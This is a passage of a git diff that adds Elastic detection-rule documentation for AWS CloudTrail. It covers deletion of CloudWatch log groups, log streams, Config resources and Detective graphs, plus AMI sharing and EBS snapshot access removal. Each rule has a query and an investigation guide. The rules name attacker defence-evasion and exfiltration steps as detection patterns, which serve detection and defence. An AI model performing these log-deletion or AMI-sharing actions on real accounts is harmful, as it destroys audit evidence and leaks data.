ranges unfamiliar to your environment. +- Review `user_agent.original` for unexpected tools (custom agents, unusual SDKs, attackers using CLI default agents). + +**Correlate with surrounding activity** +Look for preceding or subsequent CloudTrail events such as: + +- `StopLogging`, `DeleteTrail`, or CloudTrail configuration changes +- IAM permission escalations (e.g., `PutUserPolicy`, `AttachRolePolicy`) +- Security service suppression actions (e.g., GuardDuty detector deletion) +- Lambda or application configuration updates that may indicate a compromise + +If the deleted log group was associated with a Lambda execution role, review for suspicious code updates or rogue deployments. + +**Assess business or security impact** +- Identify whether the deleted log group fed: + - SIEM ingestion + - Security analytics pipelines + - Compliance/audit logs + - Operational monitoring or alerting +- Contact the service owner or development team to verify whether the deletion was intentional. + +**Determine compromise scope if malicious** +- Use CloudTrail to identify prior activity by the same user identity or IP. +- Examine authentication events (IAM, STS) for signs of stolen credentials or session hijacking. +- Identify resources or applications dependent on the deleted logging pipeline. + + +*False positive analysis* + + +- **IaC-managed environments**: Tools like Terraform or CloudFormation may delete and recreate log groups during deployments. +- **Automated cleanup jobs**: Some environments use automated retention cleanup workflows. +- **Ephemeral testing accounts**: Development/testing accounts frequently create and destroy log groups. + +To tune noise: +- Add exceptions for specific automation IAM roles or trusted source IPs. +- Require `user_agent.original` and `source.ip` conditions for baseline-based tuning. + + +*Response and remediation* + + +**Containment** +- Immediately recreate the deleted log group (if appropriate) using IaC or CloudWatch Console. +- Restrict the IAM identity that performed the deletion until the activity is validated. +- Enable or confirm CloudTrail logging in all regions to maintain broader visibility. + +**Investigation** +- Review CloudTrail activity for: + - privilege escalation attempts, + - IAM role modifications, + - security service tampering (CloudTrail, Config, GuardDuty). +- Correlate with alerts from other services (GuardDuty, Security Hub, SIEM detections). + +**Recovery and hardening** +- Enforce least privilege on `logs:DeleteLogGroup`. +- Configure AWS Config rules to alert on missing or modified log groups. +- Implement log group retention policies and IAM SCP guardrails to prevent unauthorized deletion. +- Document log group ownership and expected lifecycle management. + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "logs.amazonaws.com" + and event.action: "DeleteLogGroup" + and event.outcome: "success" + and source.ip: * + and not user_agent.original : ("AWS Internal" or *Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-log-stream-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-log-stream-deletion.asciidoc new file mode 100644 index 0000000000..5c64963c6c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-log-stream-deletion.asciidoc @@ -0,0 +1,184 @@ +[[prebuilt-rule-8-19-32-aws-cloudwatch-log-stream-deletion]] +=== AWS CloudWatch Log Stream Deletion + +Detects the deletion of an Amazon CloudWatch log stream using the "DeleteLogStream" API. Deleting a log stream permanently removes its associated log events and may disrupt security visibility, break audit trails, or suppress forensic evidence. Adversaries may delete log streams to conceal malicious actions, impair monitoring pipelines, or remove artifacts generated during post-exploitation activity. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/delete-log-stream.html +* https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteLogStream.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS CloudWatch +* Tactic: Defense Evasion +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 216 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS CloudWatch Log Stream Deletion* + + +CloudWatch log streams contain sequential log events from a single application, service, or AWS resource. +Deleting a log stream permanently removes its archived log events, which may disable monitoring workflows, eliminate +critical telemetry, or disrupt forensic visibility. + +Adversaries may delete log streams to cover their tracks after unauthorized actions, break ingestion pipelines feeding SIEM, alerting, or anomaly detection or to remove evidence before escalating privileges or moving laterally. This rule detects successful invocations of the `DeleteLogStream` API from CloudTrail. + + +*Possible investigation steps* + + +- **Identify the actor** + - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id`. + - Confirm whether the user or role normally manages CloudWatch Logs resources. + +- **Review request details** + - Inspect `aws.cloudtrail.request_parameters` to determine which log stream and parent log group were deleted. + - Assess the importance of the deleted stream: + - Was it used for VPC Flow Logs, CloudTrail, Lambda functions, ECS tasks, or application logs? + - Did it contain logs used for security detection or compliance auditing? + +- **Examine request origin and context** + - Review `source.ip` and `user_agent.original` for anomalies (e.g., unfamiliar CLI tools, suspicious automation, + unknown IP ranges, or external geolocations). + - Validate whether the request originated from a legitimate automation host or jump box. + - Check activity around the same timestamp for related operations such as: + - `DeleteLogGroup` + - `StopLogging`, `UpdateTrail`, or `DeleteTrail` + - GuardDuty detector or CloudWatch alarm deletions + - IAM policy or role modifications + +- **Determine operational justification** + - Consult change management systems or deployment pipelines to confirm whether the deletion was planned. + - Contact application owners or platform teams to determine whether the log stream was part of normal rotation or cleanup. + +- **Investigate broader compromise indicators** + - Look for suspicious activity by the same identity in the past 24–48 hours, such as: + - Failed authentication attempts + - IAM privilege escalations + - Unusual STS AssumeRole usage + - Access from new geolocations + + +*False positive analysis* + + +- **Log rotation and automation** + - Some systems delete log streams automatically when rolling new deployments or recycling compute resources. + - CI/CD pipelines managing immutable infrastructure may delete and recreate streams during each deploy. + +- **Test and development accounts** + - Dev/test environments may frequently create and delete log streams as part of iterative work. + +- **Bulk cleanup operations** + - Platform engineering teams may delete obsolete log streams during cost-optimization or log-retention management. + +If the rule triggers frequently from known infrastructure accounts or automation hosts, consider adding narrow exceptions using a combination of IAM role, IP range, or user agent. + + +*Response and remediation* + + +- **Containment** + - If the deletion is unauthorized, review other CloudWatch resources for additional tampering (alarms, log groups, metric filters). + - Temporarily restrict permissions for the implicated IAM user or role. + +- **Investigation** + - Reconstruct any missing telemetry from alternative sources (e.g., S3 buckets, application logs, third-party logging systems). + - Review CloudTrail and Config timelines for preceding suspicious events. + - Validate whether the deleted log stream contained evidence of prior compromise. + +- **Recovery and hardening** + - Implement IAM least-privilege for `logs:DeleteLogStream`. + - Enable AWS Config rules to monitor CloudWatch Logs configuration changes. + - Ensure that business-critical log groups enforce minimum retention periods and prevent accidental deletion. + - Integrate log stream lifecycle management into CI/CD to avoid manual deletions. + - Establish guardrails using Service Control Policies (SCPs) to block log deletions outside designated automation roles. + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "logs.amazonaws.com" + and event.action: "DeleteLogStream" + and event.outcome: "success" + and source.ip: * + and not user_agent.original: ("AWS Internal" or *Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-config-resource-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-config-resource-deletion.asciidoc new file mode 100644 index 0000000000..aec415f7dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-config-resource-deletion.asciidoc @@ -0,0 +1,170 @@ +[[prebuilt-rule-8-19-32-aws-config-resource-deletion]] +=== AWS Config Resource Deletion + +Identifies attempts to delete AWS Config resources. AWS Config provides continuous visibility into resource configuration changes and compliance posture across an account. Deleting Config components can significantly reduce security visibility and auditability. Adversaries may delete or disable Config resources to evade detection, hide prior activity, or weaken governance controls before or after other malicious actions. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/config/latest/developerguide/how-does-config-work.html +* https://docs.aws.amazon.com/config/latest/APIReference/API_Operations.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Config +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Config Resource Deletion* + + +AWS Config records configuration changes, relationships, and compliance status for AWS resources over time. +Deleting Config components such as recorders, delivery channels, rules, or conformance packs disrupts +security monitoring, compliance enforcement, and forensic visibility. This behavior is uncommon outside of +planned infrastructure changes and should be treated as high-risk when unexpected. This rule detects successful deletion of AWS Config resources. + + +*Possible investigation steps* + + +**Identify the actor** +- Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine who initiated the deletion. +- Confirm whether this principal typically manages AWS Config or centralized security tooling. +- Check `user_agent.original` to determine whether the action was performed via console, CLI, SDK, or automation. + +**Determine what was deleted** +- Inspect `event.action` and `aws.cloudtrail.request_parameters` to identify which Config component was removed + (e.g., configuration recorder, delivery channel, rule, aggregator, or conformance pack). +- Assess whether the deleted resource was account-scoped or organization-wide. Used for compliance reporting, guardrails, or security monitoring. +- Identify the affected regions and accounts using `cloud.region` and `cloud.account.id`. + +**Reconstruct timing and intent** +- Use `@timestamp` to correlate the deletion with: + - IAM changes (role updates, policy modifications, STS activity). + - Other monitoring disruptions (CloudTrail, GuardDuty, Security Hub). + - Destructive or high-impact actions occurring shortly before or after. +- Compare the timing against approved maintenance windows or infrastructure changes. + +**Correlate with broader activity** +- Pivot in CloudTrail on the same principal or access key to identify: + - Additional attempts to disable logging or security controls. + - Resource deletions or configuration weakening across services. +- Evaluate whether the deletion appears isolated or part of a broader evasion sequence. + +**Validate intent with stakeholders** +- Confirm with security, cloud platform, or compliance teams whether the deletion was planned and approved. +- Verify whether replacement Config resources were created shortly after, or whether monitoring remains disabled. + + +*False positive analysis* + + +- **Planned environment changes** + - Non-production account teardown, environment consolidation, or compliance tool migrations may involve + deletion of Config resources. + +- **Authorized security automation** + - Approved automation or security tooling may delete and recreate Config components during setup or remediation. + - Tune exceptions carefully using specific principals or automation roles rather than broad exclusions. + + +*Response and remediation* + + +- **Contain and restore visibility** + - If unauthorized, immediately re-enable AWS Config components, including recorders and delivery channels. + - Validate that historical configuration data and compliance reporting resume as expected. + +- **Investigate scope and impact** + - Determine how long Config visibility was impaired and what activity may have occurred during that window. + - Review other monitoring gaps (e.g., CloudTrail or GuardDuty changes) for coordinated evasion. + +- **Credential and access review** + - Rotate or disable credentials associated with the deleting principal if compromise is suspected. + - Review IAM permissions to ensure only a minimal, well-defined set of roles can manage AWS Config. + +- **Hardening and prevention** + - Use SCPs or IAM conditions to restrict deletion of Config resources in production and security accounts. + - Implement AWS Config rules or Security Hub controls to alert when Config is disabled or degraded. + - Document and formalize change procedures for governance tooling. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: config.amazonaws.com + and event.outcome: success + and event.action: (DeleteConfigRule or DeleteOrganizationConfigRule or DeleteConfigurationAggregator or + DeleteConfigurationRecorder or DeleteConformancePack or DeleteOrganizationConformancePack or + DeleteDeliveryChannel or DeleteRemediationConfiguration or DeleteRetentionConfiguration) + and not aws.cloudtrail.user_identity.invoked_by: (securityhub.amazonaws.com or fms.amazonaws.com or controltower.amazonaws.com or config-conforms.amazonaws.com) + and not user_agent.original: (*Pulumi* or *Terraform*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-detective-graph-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-detective-graph-deleted.asciidoc new file mode 100644 index 0000000000..4a21579a71 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-detective-graph-deleted.asciidoc @@ -0,0 +1,113 @@ +[[prebuilt-rule-8-19-32-aws-detective-graph-deleted]] +=== AWS Detective Graph Deleted + +Detects the deletion of an Amazon Detective behavior graph via the DeleteGraph API. Amazon Detective automatically collects log data from AWS services and uses machine learning, statistical analysis, and graph theory to build an interactive model of resource behaviors and interactions. Deleting a behavior graph destroys its historical analysis data and removes the ability to investigate security incidents using Detective's relationship mapping. An attacker with sufficient IAM permissions may delete the Detective graph to impair forensic investigation of a compromise. + +*Rule type*: query + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/detective/latest/APIReference/API_DeleteGraph.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Detective +* Rule Type: Custom Query (KQL) +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS Detective Graph Deleted* + + +Amazon Detective builds a behavior graph from CloudTrail, VPC Flow Logs, and GuardDuty findings, enabling investigation teams to trace the full scope and timeline of a security incident. `DeleteGraph` is a rare, irreversible operation — the historical graph data cannot be recovered after deletion. An adversary who deletes the Detective graph removes a key forensic investigation tool, making it harder to understand the scope of a compromise. + + +*Possible investigation steps* + + +- Identify the caller in `aws.cloudtrail.user_identity.arn` and `user.name`. Confirm whether this is an authorized cloud administrator or an anomalous identity. +- Check whether the deletion was preceded by other defense-evasion actions in the same time window: GuardDuty detector deletion, CloudTrail StopLogging, Security Hub disable. +- Determine how long the Detective graph had been active and what historical data was lost. +- Review all IAM actions by this identity in the 24 hours before the deletion. + + +*False positive analysis* + + +- Account decommissioning workflows may include Detective graph deletion as part of teardown. Verify via change management records. + + +*Response and remediation* + + +- Re-enable Amazon Detective for the affected account and region. +- Reconstruct investigation context from raw CloudTrail, VPC Flow Logs, and GuardDuty findings. +- Revoke active sessions for the deleting identity if the action was unauthorized. +- Add an SCP restricting `detective:DeleteGraph` to break-glass administrator roles. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. Amazon Detective must be enabled in the account for this event to appear. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "detective.amazonaws.com" + and event.action: "DeleteGraph" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-ami-shared-with-another-account.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-ami-shared-with-another-account.asciidoc new file mode 100644 index 0000000000..60fa0a36d8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-ami-shared-with-another-account.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-32-aws-ec2-ami-shared-with-another-account]] +=== AWS EC2 AMI Shared with Another Account + +Identifies an AWS Amazon Machine Image (AMI) being shared with another AWS account. Adversaries with access may share an AMI with an external AWS account as a means of data exfiltration. AMIs can contain secrets, bash histories, code artifacts, and other sensitive data that adversaries may abuse if shared with unauthorized accounts. AMIs can be made publicly available accidentally as well. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html +* https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html +* https://stratus-red-team.cloud/attack-techniques/AWS/aws.exfiltration.ec2-share-ami/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Exfiltration +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 9 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EC2 AMI Shared with Another Account* + + +This rule identifies when an Amazon Machine Image (AMI) is shared with another AWS account. While sharing AMIs is a common practice, adversaries may exploit this feature to exfiltrate data by sharing AMIs with external accounts under their control. + + +*Possible Investigation Steps* + + +- **Review the Sharing Event**: Identify the AMI involved and review the event details in AWS CloudTrail. Look for `ModifyImageAttribute` actions where the AMI attributes were changed to include additional user accounts. + - **Request and Response Parameters**: Check the `aws.cloudtrail.request_parameters` and `aws.response.response_elements` fields in the CloudTrail event to identify the AMI ID and the user ID of the account with which the AMI was shared. +- **Verify the Shared AMI**: Check the AMI that was shared and its contents to determine the sensitivity of the data stored within it. +- **Contextualize with Recent Changes**: Compare this sharing event against recent changes in AMI configurations and deployments. Look for any other recent permissions changes or unusual administrative actions. +- **Validate External Account**: Examine the AWS account to which the AMI was shared. Determine whether this account is known and previously authorized to access such resources. +- **Interview Relevant Personnel**: If the share was initiated by a user, verify the intent and authorization for this action with the person or team responsible for managing AMI deployments. +- **Audit Related Security Policies**: Check the security policies governing AMI sharing within your organization to ensure they are being followed and are adequate to prevent unauthorized sharing. + + +*False Positive Analysis* + + +- **Legitimate Sharing Practices**: AMI sharing is a common and legitimate practice for collaboration and resource management in AWS. Always verify that the sharing activity was unauthorized before escalating. +- **Automation Tools**: Some organizations use automation tools for AMI management which might programmatically share AMIs. Verify if such tools are in operation and whether their actions are responsible for the observed behavior. +- **AWS Services**: Some AWS services, such as WorkSpaces and Backup, automate AMI sharing when users configure cross-account sharing or disaster recovery plans. These will appear in CloudTrail with `userIdentity.invokedBy` and `source.address` fields like `workspaces.amazonaws.com` or `backup.amazonaws.com`. Confirm that such activity aligns with your organization's approved configurations. + + +*Response and Remediation* + + +- **Review and Revoke Unauthorized Shares**: If the share is found to be unauthorized, immediately revoke the shared permissions from the AMI. +- **Enhance Monitoring of Shared AMIs**: Implement monitoring to track changes to shared AMIs and alert on unauthorized access patterns. +- **Incident Response**: If malicious intent is confirmed, consider it a data breach incident and initiate the incident response protocol. This includes further investigation, containment, and recovery. +- **Policy Update**: Review and possibly update your organization’s policies on AMI sharing to tighten control and prevent unauthorized access. +- **Educate Users**: Conduct training sessions for users involved in managing AMIs to reinforce best practices and organizational policies regarding AMI sharing. + + +*Additional Information* + + +For more information on managing and sharing AMIs, refer to the https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html[Amazon EC2 User Guide on AMIs] and https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html[Sharing AMIs]. Additionally, explore adversarial techniques related to data exfiltration via AMI sharing as documented by Stratus Red Team https://stratus-red-team.cloud/attack-techniques/AWS/aws.exfiltration.ec2-share-ami/[here]. + + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" and event.provider: "ec2.amazonaws.com" + and event.action: ModifyImageAttribute and event.outcome: success + and aws.cloudtrail.request_parameters: *add=* + and not aws.cloudtrail.user_identity.invoked_by: "assets.marketplace.amazonaws.com" + and not user_agent.original: (*packer-plugin-amazon* or *Ansible*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-ebs-snapshot-access-removed.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-ebs-snapshot-access-removed.asciidoc new file mode 100644 index 0000000000..c112528ef8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-ebs-snapshot-access-removed.asciidoc @@ -0,0 +1,169 @@ +[[prebuilt-rule-8-19-32-aws-ec2-ebs-snapshot-access-removed]] +=== AWS EC2 EBS Snapshot Access Removed + +Identifies the removal of access permissions from a shared AWS EC2 EBS snapshot. EBS snapshots are essential for data retention and disaster recovery. Adversaries may revoke or modify snapshot permissions to prevent legitimate users from accessing backups, thereby obstructing recovery efforts after data loss or destructive actions. This tactic can also be used to evade detection or maintain exclusive access to critical backups, ultimately increasing the impact of an attack and complicating incident response. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/ebs/latest/userguide/ebs-modifying-snapshot-permissions.html +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifySnapshotAttribute.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Impact +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 8 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EC2 EBS Snapshot Access Removed* + + +This rule detects when access is removed for an AWS EC2 EBS snapshot. EBS virtual disks can be copied into snapshots, which can then be used as backups for recovery and data retention efforts. Adversaries may attempt to remove access to snapshots in order to prevent legitimate users or automated processes from accessing or restoring from snapshots following data loss, ransomware, or destructive actions. This can significantly delay or even prevent recovery, increasing the impact of the attack. Restricting snapshot access may help adversaries cover their tracks by making it harder for defenders to analyze or recover deleted or altered data. Attackers may remove permissions for all users except their own compromised account, allowing them to maintain exclusive access to backups for future use or leverage. Understanding the context and legitimacy of such changes is crucial to determine if the action is benign or malicious. + + +*Possible investigation steps:* + + +- **Identify who performed the action**: Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to identify who made the change. Evaluate whether the identity is authorized to manage EBS snapshot permissions (check IAM policies for `ec2:ModifySnapshotAttribute`). + +- **Analyze the source of the request**: Examine `source.ip` and `source.geo` fields to determine the geographical origin of the request. An external or unexpected location might indicate compromised credentials or unauthorized access. Review `user_agent.original` to determine if the request came from an expected administrative tool or host. + +- **Examine the scope of the change**: + - Review `aws.cloudtrail.request_parameters` to understand which accounts or entities had access removed. + - Look for unusual patterns such as `createVolumePermission={remove=all}` or removal of specific external or organizational accounts. + - Cross-check the affected `snapshotId` in the AWS console or via CLI to confirm current sharing status and determine if any copies or dependent volumes exist. + - Use AWS Config or AWS CLI (`describe-snapshot-attribute`) to verify whether other snapshots were modified within the same timeframe. + +- **Correlate with other activities**: + - Search CloudTrail for additional activity from the same actor or `source.ip` around the event time. + - Pay special attention to subsequent `DeleteSnapshot`, `DeregisterImage`, or `RevokeSnapshotAccess` events, which may signal ongoing destruction. + - Check for parallel IAM activity, such as policy changes that grant or revoke permissions. + - Correlate with GuardDuty or Security Hub findings related to data exfiltration, destructive actions, or unauthorized configuration changes. + - Determine if any high-value or production snapshots were affected, especially those linked to business-critical EBS volumes. + +- **Evaluate timing and intent**: Compare `@timestamp` with maintenance windows or known change requests. Actions taken outside approved hours or without associated tickets may indicate compromise or sabotage. If this change coincides with other detections (for example, `EBS encryption disabled` or `root login` events), treat it as part of a coordinated impact campaign. + + +*False positive analysis:* + + +- **Planned administrative maintenance**: Confirm whether this snapshot modification aligns with backup rotation, retention policy enforcement, or snapshot lifecycle automation. +- **Automation and tooling**: Infrastructure-as-code pipelines or DevOps scripts may legitimately remove snapshot sharing to enforce compliance. Review tags, user agents, and automation identifiers. +- **Testing or sandbox accounts**: Some non-production environments may modify snapshot access for isolation. Validate account purpose before escalating. + +If the action was expected, document the change approval and reconcile against internal audit or change-control systems. + + +*Response and remediation:* + + +**Containment and validation** +- Review and, if necessary, restore snapshot permissions using AWS Console or CLI (`modify-snapshot-attribute` with `add` parameters). +- Confirm that no additional snapshots or AMIs have had access removed. +- Restrict `ec2:ModifySnapshotAttribute` permissions to only trusted administrative roles. + +**Investigate for data destruction or persistence** +- Determine if the same actor also deleted or copied snapshots (`DeleteSnapshot`, `CopySnapshot`). +- Review subsequent volume creation or image registration events that could indicate snapshot reuse. +- Identify whether any snapshot was shared to or copied by an external AWS account. + +**Strengthen detection and monitoring** +- Enable AWS Config rules and Security Hub controls such as `ebs-snapshot-public-restorable-check`. +- Establish continuous monitoring for `ModifySnapshotAttribute` and `DeleteSnapshot` operations. +- Correlate future detections with user identity and source IP context to identify recurring behavior. + +**Recovery and hardening** +- Verify that critical snapshots and backups are retained and encrypted. +- Implement backup immutability with AWS Backup Vault Lock or S3 Object Lock for long-term protection. +- Apply service control policies (SCPs) to prevent unauthorized modification of snapshot sharing attributes. +- Conduct a post-incident review to identify the root cause and strengthen least-privilege enforcement for EBS management roles. + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS Incident Response Playbooks]**: guidance for investigating unauthorized access to modify account settings. +- **https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]**: Example framework for customers to create, develop, and integrate security playbooks in preparation for potential attack scenarios when using AWS services +- **AWS Documentation** + - 